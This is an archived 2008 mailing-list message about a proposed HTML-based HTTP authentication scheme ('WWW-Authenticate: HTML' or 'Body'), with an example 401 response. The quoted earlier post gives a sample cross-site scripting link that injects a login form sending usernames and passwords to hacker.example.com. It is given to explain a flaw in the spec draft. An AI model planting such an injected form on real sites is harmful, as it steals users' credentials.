- From: Martin Atkins <mart@degeneration.co.uk>
- Date: Thu, 27 Nov 2008 00:18:43 -0800
Ian Hickson wrote: > On Wed, 26 Nov 2008, Philip Taylor wrote: >> If I'm not misunderstanding things, there is a new attack scenario: >> >> I post a comment on someone's blog, saying <a >> href="/restricted-access.php?xsshole=<form >> action=http://hacker.example.com/capture name=login><input >> name=username><input name=password></form>">crawl me!</a> >> > > Hm, this is indeed a problem. > [snip] > > Is there anyone who can volunteer to edit this section as a separate spec? > > I guess I'll remove this section. > I may be forgetting missing some use-cases here (I don't recall what exactly motivated this custom auth scheme) but there may still be value in a cut-down version of this scheme: WWW-Authenticate: HTML which means (roughly) "The HTML document in the body contains something that, when displayed in a web browser, will allow the user to log in". Browsers can then use this authentication scheme in preference to Basic or Digest when multiple schemes are offered for a particular resource, and servers can simultaneously offer forms-based authentication and other authentication schemes at the same endpoint: HTTP/1.1 401 Unauthorized Content-type: text/html WWW-Authenticate: HTML WWW-Authenticate: Basic realm="my neat site" <form action="/login" method="POST"> ... </form> Software that is not a browser (for some suitable definition of "browser" -- something along the lines of "user-agent where form-based auth is the norm"?) can choose to use Basic authentication here. The backward-compatibility story here is bad as long as one of the offered authentication schemes is known to a downlevel browser. Per my basic research posted earlier, other, as-yet-unsupported schemes can be offered and the body will be rendered as desired except in Opera. I guess that this could be generalized to: WWW-Authenticate: Body meaning merely "the body contains something that will allow the user to log in". Browsers could presumably in this case take into account the Content-type when deciding whether to prefer this scheme over the other schemes offered, for example choosing Body over Basic only when Content-type is text/html. I concede that once you generalize it in this way it becomes even less relevant to the HTML spec than it was to begin with, though I'm not sure where else to propose such a thing, and in practice as long as websites are primarily HTML login forms presumably will be as well.
Received on Thursday, 27 November 2008 00:18:43 UTC